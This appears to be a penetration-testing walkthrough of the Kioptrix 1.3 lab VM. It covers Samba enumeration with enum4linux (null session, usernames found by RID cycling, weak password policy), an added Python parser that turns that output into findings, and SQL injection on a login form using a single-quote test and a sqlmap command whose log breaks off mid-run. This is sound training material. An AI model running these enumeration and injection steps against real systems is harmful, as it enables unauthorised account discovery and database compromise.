Penetration Testing Kioptrix Server 1.3: Enumerating Samba, SSH and HTTP [2]
Enumeration is commonly known as vulnerability scanning: it is the stage where we probe the Kioptrix server and gather information about the security weaknesses it may have.
In the first step we already found out which services and ports are open. One of them is Samba. Now we will enumerate the Samba server on Kioptrix with the help of the enum4linux tool.
- Run the enum4linux command in a terminal.
enum4linux 192.168.56.117
The result will look like this:
killu@kalidata:~$ enum4linux 192.168.56.117
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 2 10:11:02 2020
==========================
| Target Information |
==========================
Target ........... 192.168.56.117
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.56.117 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.56.117 |
==============================================
Looking up status of 192.168.56.117
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
=======================================
| Session Check on 192.168.56.117 |
=======================================
[+] Server 192.168.56.117 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.56.117 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.56.117 |
========================================
[+] Got OS info for 192.168.56.117 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.56.117 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
===============================
| Users on 192.168.56.117 |
===============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
===========================================
| Share Enumeration on 192.168.56.117 |
===========================================
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Server Comment
--------- -------
KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)
Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
[+] Attempting to map shares on 192.168.56.117
//192.168.56.117/print$ Mapping: DENIED, Listing: N/A
//192.168.56.117/IPC$ [E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
======================================================
| Password Policy Information for 192.168.56.117 |
======================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on 192.168.56.117 |
================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=========================================================================
| Users on 192.168.56.117 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-502 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-503 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-504 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-505 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-506 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-507 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-508 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-509 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-510 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-511 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-512 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-514 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-515 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-516 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-517 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-518 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-519 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-520 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-521 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-522 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-523 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-524 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-525 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-526 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-527 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-528 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-529 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-530 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-531 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-532 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-533 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-534 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-535 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-536 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-537 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-538 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-539 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-540 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-541 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-542 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-543 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-544 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-545 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-546 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-547 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-548 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-549 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-550 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
S-1-5-21-2529228035-991147148-3991031631-1001 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1002 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1003 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1004 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1005 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1006 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1007 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1008 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1009 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1010 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1011 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1012 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1013 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1014 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1015 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1016 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1017 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1018 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1019 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1020 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1021 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1022 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1023 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1024 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1025 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1026 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1027 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1028 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1029 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1030 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1031 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1032 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1033 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1034 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1035 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1036 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1037 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1038 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1039 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1040 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1041 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1042 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1043 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1044 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1045 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1046 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1047 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1048 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1049 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1050 *unknown*\*unknown* (8)
===============================================
| Getting printer info for 192.168.56.117 |
===============================================
No printers returned.
enum4linux complete on Thu Jan 2 10:11:21 2020
The parts we need to pay attention to are these:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
Explanation:
From the output above we obtain the Samba version and the usernames present on that server (loneferret, john and robert).
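As an added example (not part of the original post), a small Python triage script that pulls exactly these lines out of enum4linux output (Samba version, null session, RID-cycled Unix users, password policy) and turns them into findings; the embedded SAMPLE is an excerpt of the output shown above.

```python
"""Triage helper for enum4linux output (added example, not the post's code).
It extracts the items the walkthrough says to pay attention to: whether a
null session was accepted, the Samba version in the banner, the Samba
accounts, the local Unix users found by RID cycling on S-1-22-1, and the
partial password policy, and reports them as findings."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Excerpt of the enum4linux output quoted in the post, embedded so the
# script runs offline.
SAMPLE = r"""
[+] Server 192.168.56.117 allows sessions using username '', password ''
[+] Got OS info for 192.168.56.117 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
[I] Found new SID: S-1-22-1
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
"""


@dataclass
class Enum4linuxFindings:
    null_session: bool = False
    samba_version: str | None = None
    samba_accounts: dict[str, int] = field(default_factory=dict)  # name -> RID
    unix_users: list[str] = field(default_factory=list)
    builtin_groups: list[str] = field(default_factory=list)
    password_complexity: str | None = None
    min_password_length: int | None = None


def parse_enum4linux(text: str) -> Enum4linuxFindings:
    f = Enum4linuxFindings()
    # Session check: an empty username/password pair was accepted.
    f.null_session = bool(re.search(
        r"allows sessions using username '', password ''", text))
    m = re.search(r"Server=\[Samba ([^\]]+)\]", text)
    if m:
        f.samba_version = m.group(1)
    for name, rid in re.findall(r"user:\[([^\]]+)\] rid:\[(0x[0-9a-fA-F]+)\]", text):
        f.samba_accounts[name] = int(rid, 16)
    # S-1-22-1 is the Unix Users authority; cycling its RIDs reveals local
    # accounts even when the account list is otherwise not offered.
    f.unix_users = re.findall(
        r"^S-1-22-1-\d+\s+Unix User\\(\S+)\s+\(Local User\)", text, re.M)
    f.builtin_groups = re.findall(
        r"^S-1-5-32-\d+\s+BUILTIN\\(.+?)\s+\(Local Group\)", text, re.M)
    m = re.search(r"Password Complexity:\s*(\w+)", text)
    if m:
        f.password_complexity = m.group(1)
    m = re.search(r"Minimum Password Length:\s*(\d+)", text)
    if m:
        f.min_password_length = int(m.group(1))
    return f


def triage(f: Enum4linuxFindings) -> list[str]:
    """Turn the parsed output into findings a defender can act on."""
    issues = []
    if f.null_session:
        issues.append("null session accepted: anonymous clients can query users, shares and policy")
    if f.unix_users:
        issues.append("local usernames disclosed via RID cycling: " + ", ".join(sorted(f.unix_users)))
    if f.password_complexity and f.password_complexity.lower() == "disabled":
        issues.append("password complexity disabled")
    if f.min_password_length == 0:
        issues.append("minimum password length is 0")
    if f.samba_version:
        issues.append(f"Samba version disclosed in banner: {f.samba_version}")
    return issues


if __name__ == "__main__":
    for line in triage(parse_enum4linux(SAMPLE)):
        print("[!]", line)
```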
Next comes the httpd enumeration stage, where we look for a valid login password by way of SQL injection.
In the previous step we already accessed the HTTP service of the Kioptrix server, as shown in the image below.
Enter admin in the username field and ' (just a single quote) in the password field, then submit. An SQL error will appear, as in the image below.
This indicates that the password field has a security hole in its SQL query.
Next we perform SQL injection on the password field with the help of the sqlmap tool.
Run the following command in a terminal:
sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3
The result obtained is as follows:
killu@kalidata:~$ sudo sqlmap -u "http://192.168.56.117/checklogin.php" --data "myusername=admin&mypassword=nmdb" -p mypassword --dbms=MySQL --level=5 --risk=3
[sudo] password for killu:
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201604230a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:04:59
[11:04:59] [INFO] testing connection to the target URL
[11:04:59] [INFO] heuristics detected web page charset 'ascii'
[11:04:59] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:04:59] [INFO] testing if the target URL is stable
[11:05:00] [INFO] target URL is stable
[11:05:00] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[11:05:00] [INFO] testing for SQL injection on POST parameter 'mypassword'
[11:05:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:05:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
sqlmap got a 302 redirect to 'http://192.168.56.117:80/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[11:06:26] [INFO] POST parameter 'mypassword' seems to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[11:06:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:06:26] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:06:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:06:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:06:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:06:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:06:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:06:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[11:06:27] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:06:27] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[11:06:27] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:06:27] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:06:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:06:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:06:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:06:27] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:06:27] [INFO] testing 'MySQL inline queries'
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[11:06:27] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:06:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:06:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:06:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:06:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[11:06:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[11:06:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[11:06:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[11:06:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[11:06:49] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[11:06:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[11:06:59] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[11:07:09] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[11:07:14] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[11:07:20] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[11:07:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[11:07:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[11:07:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comment)'
[11:07:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:07:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:07:44] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:07:44] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:07:54] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:07:54] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:08:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:08:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:08:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:08:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)'
[11:08:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[11:08:04] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:08:04] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:08:04] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:08:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:08:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:08:09] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:08:24] [INFO] testing 'Generic UNION query (41) - 22 to 40 columns'
[11:08:25] [INFO] testing 'Generic UNION query (41) - 42 to 60 columns'
